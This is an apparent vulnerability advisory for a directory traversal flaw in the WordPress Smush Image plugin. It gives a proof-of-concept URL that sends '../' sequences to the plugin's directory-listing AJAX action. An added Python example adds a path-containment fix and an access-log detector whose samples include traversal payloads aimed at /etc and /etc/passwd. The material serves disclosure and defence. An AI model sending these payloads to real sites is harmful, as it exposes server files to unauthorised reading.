WordPress Smush Image plugin version 2.7.4.1 suffers from a directory traversal vulnerability.
21db7b5485a4de9d8322d67427bf0278edc32447bfb7c5844a7851f081d16ba2
Class: Directory traversal
Remote: Yes
Credit: Ricardo Sanchez
The Smush Image WordPress plugin is prone to a directory traversal vulnerability
because it fails to sufficiently restrict which directories its directory-listing AJAX action may read.
Proof of concept (demo URL):
http://localhost/wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx
Confirmation:
https://wordpress.org/support/topic/file-transversal-bug/#post-9554401
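The following is an added defender-side example; it is not code from the advisory or from the Smush plugin. It shows the two things a practitioner wants around a directory-traversal bug in a directory-listing handler: a containment check that canonicalises a user-supplied `dir` value against a base directory before it is used, and a detector that flags web-server access-log lines carrying a traversing `dir` parameter to `admin-ajax.php`. The uploads path and the log lines are constructed for the example (the first log line reuses the demo URL above); the detector is written generically for any `admin-ajax.php` `dir` traversal rather than only the action named in the advisory.

```python
import os
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed example: the directory a listing handler is meant to stay
# inside of. Not a path taken from the advisory.
UPLOADS_BASE = "/var/www/html/wp-content/uploads"


def resolve_within_base(base: str, requested: str) -> Optional[str]:
    """Resolve a user-supplied relative directory against ``base``.

    Returns the canonical absolute path when it is ``base`` itself or lies
    inside it, otherwise ``None``. ``realpath`` collapses ``..`` segments and
    follows symlinks, so checking the *resolved* path catches traversal that
    a prefix check on the raw input would miss.
    """
    if "\x00" in requested:          # embedded NUL is never a valid segment
        return None
    base_real = os.path.realpath(base)
    # os.path.join drops ``base_real`` when ``requested`` is absolute; the
    # containment check below then rejects it instead of honouring it.
    target = os.path.realpath(os.path.join(base_real, requested))
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target


# A ``..`` segment delimited by a slash, backslash, or the string boundary.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flags_traversal_request(log_line: str) -> bool:
    """True when an access-log line requests admin-ajax.php with a ``dir``
    parameter that contains a parent-directory segment.

    ``parse_qs`` removes one layer of percent-encoding; ``unquote`` is applied
    once more so double-encoded sequences such as ``%252e%252e`` are caught.
    """
    match = REQUEST_RE.search(log_line)
    if not match:
        return False
    url = urlsplit(match.group(1))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    for value in parse_qs(url.query).get("dir", []):
        if TRAVERSAL_RE.search(unquote(value)):
            return True
    return False


def scan(lines: List[str]) -> List[int]:
    """Return the indices of log lines that look like traversal attempts."""
    return [i for i, line in enumerate(lines) if flags_traversal_request(line)]


# Constructed access-log lines (Common Log Format) for the example.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2017:13:55:36 +0000] "GET /wordpress/wp-admin/admin-ajax.php'
    '?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx HTTP/1.1" 200 1532',
    '203.0.113.5 - - [10/Oct/2017:13:55:40 +0000] "GET /wordpress/wp-admin/admin-ajax.php'
    '?dir=..%252F..%252Fetc&action=smush_get_directory_list HTTP/1.1" 200 1532',
    '198.51.100.7 - - [10/Oct/2017:13:56:01 +0000] "GET /wordpress/wp-admin/admin-ajax.php'
    '?dir=2017/10&multiSelect=true&action=smush_get_directory_list HTTP/1.1" 200 840',
    '198.51.100.7 - - [10/Oct/2017:13:56:05 +0000] "GET /wordpress/index.php?p=../../etc/passwd HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for req in ["2017/10", "../../../../../../", "/etc", ""]:
        print(repr(req), "->", resolve_within_base(UPLOADS_BASE, req))
    print("flagged log lines:", scan(SAMPLE_LOG))
```

The containment check is the mitigation: a listing handler should resolve the requested directory with `resolve_within_base` and refuse anything that returns `None`, in addition to verifying the AJAX nonce and the caller's capability. The log scan is the detection side and works on existing access logs without any plugin changes.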